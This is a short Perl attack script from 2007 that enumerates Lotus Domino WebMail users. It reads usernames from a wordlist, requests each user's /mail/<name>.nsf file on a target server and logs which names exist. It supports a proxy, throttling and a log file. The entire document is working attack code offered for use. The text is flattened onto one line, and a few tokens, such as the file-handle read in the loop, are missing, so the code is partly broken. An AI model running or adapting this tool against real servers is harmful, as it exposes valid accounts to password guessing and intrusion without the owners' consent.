#!/usr/bin/perl -w # # Lotus Domino WebMail Users Enumeration [ 2007/04/05 ] # Advisory : http://www.securityfocus.com/bid/3991 # # Simple script for Lotus Domino users enumeration # # Author : Alfredo Pesoli # Site : www.0xcafebabe.it # use strict; use LWP::UserAgent; use Getopt::Long; my ($url, $referer, $file, $lfile, $sleep, $error, $proxy, $uagent); my $author = "Alfredo Pesoli "; my ($cg, $count) = 0; $sleep = 0; my $opt = GetOptions ( 'url=s' => \$url, 'file=s' => \$file, 'lfile=s' => \$lfile, 'sleep=i' => \$sleep, 'proxy=s' => \$proxy, 'uagent=s' => \$uagent ); print "\n Lotus Domino WebMail Users Enumeration \n"; print " ".$author."\n"; print "+--------------------------------------+\n\n"; if ( !$url || !$file ) { &usage; } die "\nError: $file no such file\n\n" if !(open LIST, "<$file"); my $start = "[-] Forcing => ".$url."\n\n"; print $start; chomp (my $st_date = `date "+%m/%d/%Y, %H:%M:%S"`); if ( $lfile ) { die "\nError: $lfile: error writing to file\n\n" if !(open LOG, ">>$lfile"); print LOG $start; select(LOG); $| = 1; } my $i = 0; my $username; while () { next if $_ eq "\n"; chomp($username = $_); my $ob = &create_obj(); my $page = "/mail/".$username.".nsf"; sleep($sleep); my $res = $ob->get($url.$page); if ($res->is_success) { print $username." GUESSED \n"; $cg++; } else { print $username." BAD\n"; } $count++; } close LIST; result("STDOUT"); if ( $lfile ) { result("LOG"); } sub result { select($_[0]); print "\n+--------------------------------------+\n"; print "Users tested : ".$count."\n"; print "Users guessed : ".$cg."\n"; chomp(my $en_date = `date "+%m/%d/%Y, %H:%M:%S"`); print "Started : $st_date\n"; print "Ended : $en_date\n\n"; } sub create_obj() { my $ua = LWP::UserAgent->new ( keep_alive => "0" ); if ( $proxy ) { $ua->proxy('http', $proxy); } return $ua; } sub usage() { print "Usage:\n ".$0." -url -file [-lfile ] [-sleep ] [-proxy ]\n\n"; exit(1); }